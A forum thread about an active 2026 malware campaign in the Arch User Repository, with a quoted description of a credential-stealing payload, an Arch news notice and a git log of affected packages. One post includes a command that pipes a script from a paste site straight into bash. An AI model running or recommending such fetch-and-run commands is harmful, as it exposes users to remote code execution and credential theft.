WHAT??? And not do my at least twice daily yay? Heresy!
In all truth, I do updates every couple days, but I only have about a few items from the AUR that aren’t in the repository.
did some independent reading this aft:
"The payload targets SSH keys, GitHub tokens, npm credentials, Docker and Podman auth, HashiCorp Vault tokens, browser session data, Slack, Discord, Microsoft Teams, Telegram, VPN config files, and shell histories. It also enumerates Chromium-family browser profiles – reading SQLite cookie databases and LevelDB local storage and queries Slack, Teams, Discord, GitHub, and OpenAI/ChatGPT APIs directly with any stolen tokens or cookies.
This is a credential vacuum aimed squarely at developers. Your AWS keys in .env, your GitHub PAT in ~/.gitconfig, your SSH private key for that production server – all of it in scope."
Pay close attention to the second-to-last sentence here ^^.
Bad guys had a very specific user in mind. Who would want that?
My alias for updating is the following…
alias up='yay -Pw && yay -Syyu && flatpak update && flatpak uninstall --unused'
The -Pw shows me any Arch news I have not seen. Which came in handy just now…
─❯ up
2026-06-12 Active AUR malicious packages incident
We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.
We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed.
While this is happening, and while we work to create a more permanent solution, users may see issues with the following:
Creating new accounts on the AUR
Pushing package updates
Adopting or creating new packages
We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time.
If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.
[sudo] password for wombat:
I haven’t kept track of all comments since there is a lot of them and I just saw the thread today, so no idea if anything has already been said or not.
But this is one of the reasons I prefer to update once a week, or in some cases it could be every 2 weeks. It’s because a lot of these issues are caught within that time unless I am unlucky and malware was added right when I update. A believe these were pretty much orphaned packages affected but technically this could happen to any AUR build script.
Of course I do read the PKGBUILDs and look out for dependencies being installed (especially new ones), external links in the script, dangerous commands, plus all the other things you need to do. But I do think a better system needs to be in place for the AUR as this was bound to happen with Linux and Arch becoming more popular.
But I think one of the issues is there are lots of core AUR packages that should really be on the official repositories. I have read that apparently popular packages get moved to official but I have never seen it happen for any I use, Librewolf-bin for example has a huge amount of votes and popularity and should be on the official repositories really. If more packages were on the official repository it would reduce how many people would need to use the AUR overall. Also maybe setting orphaned packages to read-only and a new maintainer verified.
Posting = Informing =/ Endorsing
So don’t draw your gun unless you have other compelling reasons 
Arch has been under sustained attack for over a year now!
Who exactly is this directed at?
Depends. The poster. The developer. The LLM.
Those holding the guns have always some compelling reason…
So should we hold off on any AUR package updates until the dust settles? Or is it “safe” now?
I ran the script posted above and it came up clean. But during a yay update, I noticed that proton-mail showed npm transactions during the build. I don’t see anything unusual in the pkgbuild…what are we supposed to look for?
curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
Just out of curiosity, proton mail seems to be an electron app. That is, you practically install a (mini) browser packaged with your application.
I use a separate profile in Librewolf, that I have anyways installed, to use Proton’s web interface to log in to my account.
One less dependency on AUR, one less headache. WinWin!
I`ll avoid updating AUR packages at all until it’s clear that the bad actor isn’t actively compromising packages anymore. As the creation of new Arch user accounts is paused due to this campaign, as well as pushing new package updates within the AUR is much more restrictive than usual, if I understood it right. It’s just a matter of time until the end of this campaign. Unless the attackers manage to impersonate additional user accounts.
I’ve just checked my machine again against an updated list of packages affected, with no hits. The current list could be used with the various checking scripts which are passed around at the moment, unless the packages are hard coded within the script itself.
Up so far, the whole attack vector has been to take over orphaned packages within the AUR using three different arch user accounts. Of which only one has been impersonated via git commit forgery. So in essence, if you’ve regularly removed any orphans during your update routine, which I do regularly, the risk is already mitigated by proper maintenance, at least to a certain degree.
Let’s look at the flipside, many eyes are proactively checking the AUR at the moment to identify malware injection. And eventually this will not only result in the removal of not only the current malware injection. But also the removal of packages that haven been orphaned and did see little to no use at all and eventually they will also discover other bad actors in the process.
Nevermind. I see it was already posted.
I’m glad I managed to get rid of all AUR packages. I switched over to a very few (6) flatpaks instead or tried to work around it. I even managed by today to replace the few GNOME extensions with own written stuff or “extra” packages. No npm anyway…
Of course this is no guarantee or 100% security, but it feels a bit more safe.
As I like to try out new stuff i no only do this in a VM befor I decide: do I really need this on my “prod machine”?
Hackers and evil guys obviously start to like Linux… damn…
Security is always about reducing the attack surface/vectors. Never about 100%.
The whole schtick of “bro arch sucks because of this” has been long played out and I’m starting to get tired of it.
Yes, the AUR is used at one’s own risk, but the Arch team could’ve done MUCH better here. For example, maybe fresh accounts shouldn’t be able to simply adopt thousands of packages?
Manually vetting each update to any PKGBUILD is an unreasonable ask, if one were to push for that, they’d have to make that apply only to new accounts or something.
Of course, this doesn’t solve the problem of an old account being compromised, but a lot of online services already deny access if the location is strange for the account (updates to packages could be blocked until you allow the location via email). AI could possibly be used, but I wouldn’t want to train a blackbox on open-source code (that could then go into one’s proprietary program, not to mention the costs).
Point is: The Arch team could’ve done better, but the whole point of the AUR is that it’s the Arch User Repository, not extra. Trying to place moderation on it has a high chance of being either draconian or completely ineffective, which is probably why things are the way they are now. I’d still install some sort of protection, like not allowing new accounts (or strange logins from old ones) to simply take action on thousands of packages.
I assume the main idea is that most packages an user might want is under extra? Or very well maintained AUR packages eventually get into extra? Either way, it’s one of the strong points of Arch, but also one of the its weakest points, IMHO.
I personally go by the recommendation of the developer that maintains and develops the software I want to use: if they say on Arch systems, one should use the AUR package, I will use the AUR package and inspect the PKGBUILD file. Otherwise, I use the package in the repository (if it exists), Flatpaks, AppImages or even Snaps if it comes down to it (yes, they kind of suck, but I would rather have my preferred software than not sometimes).
So, AUR and other git repositories have been compromised: surprise surprise. It’s all happened many times before and it will never stop (read GEB, written in the early 70’s – before the internet and/or viruses – published in about 1977). Humans love to destroy other humans, and their properties, their work, their lives, whether it’s AUR repos or towns and villages in the middle east.
All users, myself and users like me included, should read, mark, learn and inwardly digest these many times linked-to Arch wiki pages:
5 Likes
It’s not over.
here we go again, now with obfuscated code:
$ git log --all -S “‘b’‘u’‘n’” --since=“3 hours ago” --oneline
af09b1cf1b59 (python-django-js-asset) Update dependencies (python-django-js-asset)
fc1686472116 (puppy-browser) Add missing deps (puppy-browser)
a5770512c0a0 (privacy-redirect-git) add deps
ad43b9d36fb0 (playhouse-git) rebuild
dee42adb1d4a (plasma6-applets-fancytasks) updpkgsums (plasma6-applets-fancytasks)
18e160e4af66 (openlayers) upgpkg
77e940aca52d (npm-accel) add deps (npm-accel)
9f78f86d315b (nodejs-vim-debugger) updpkgsums
a939ae0b94fa (nodejs-ws) Fix deps
2f45cba74d0e (nodejs-qunit) upgpkg (nodejs-qunit)
ae9efc2316e2 (nodejs-sweet) Fix build
2b0281471e67 (nodejs-pkg) Fix source
d8ec8d1b1667 (nodejs-nodemailer) Fix build (nodejs-nodemailer)
97423ad53ffc (nodejs-jsfmt) sync
8ecc4763ae6e (nodejs-json-to-js) Fix build (nodejs-json-to-js)
8c8777cb6efd (nodejs-jscs) add deps
def9a9c26f6d (nodejs-dicy-cli) Update source
520509753f52 (nodejs-browser-sync) Fix deps (nodejs-browser-sync)
50e70f41e533 (nitrogen-git) Fix install (nitrogen-git)
51f1f31c00fc (nem-wallet) Bump pkgrel
b0620ca63777 (neovim-telescope-file-browser-git) add deps
fd7c2046c370 (nanocurrency) Update PKGBUILD
8b08ce7e00be (librewolf-extension-vimiumc-bin) Fix install
dd99ef59434f (librewolf-extension-protonpass-bin) updpkgsums
5b92cb26426c (kmorph) Update dependencies (kmorph)
5efa44bdde97 (kibana6) Fix build
02262d4c0ca9 (just-js) updpkgsums
ff8e6c657a41 (kcmlaptop) Update source (kcmlaptop)
71061a13a17d (iceweasel) Fix build
7c3118898b73 (hudkit-wayland) Fix build (hudkit-wayland)
191ddf65e033 (hack-browser-data-git) Add missing deps
015d37ebcdf4 (gjs-git) sync
81136bdeb450 (fontfinder) sync
cce5fff63f88 (firefox-floccus) sync (firefox-floccus)
fe04bb990a35 (firefox-esr-noscript) rebuild
370d6ff5f5df (felida-bin) Fix deps
5ae118ed955e (edfbrowser-git) add deps
ac14770e3b30 (deno-git) Bump pkgrel
f9b91f5436dc (ctjs-bin) sync
3cbb060789e8 (concordium-desktop-wallet-testnet-bin) Fix build
3d477e3acbdc (cl-javascript) upgpkg
e08dd6e54f27 (cl-parse-js) Fix source
a82d32cd30a0 (claymore-miner-bin) rebuild
5f88b6813f74 (cl-parenscript) Fix install (cl-parenscript)
9441cefa807b (chia-git) Fix install
17870c40e170 (certbox-bin) Fix source
656ebbc409a9 (catalyst5-browser) Update source
525431fabeea (btdex-git) updpkgsums (btdex-git)
1e52b3bc3e06 Fix build
065f7bbc0b4c (algorand-devtools-bin) Fix source
bb5741e96690 (beaker-browser-git) Update PKGBUILD (beaker-browser-git)
b3cc85a2a3e3 (aura-browser) Update dependencies
ebf8ba97fc88 (amfora-favicons-git) updpkg (amfora-favicons-git)
855e58cf9dff (atto-bin) upgpkg
In my case, if a package gets orphaned, I check to see if I need it and uninstall it if I can. For other AUR packages, I typically check out the source page first. Guess I should also start consistently reviewing package build scripts now as well.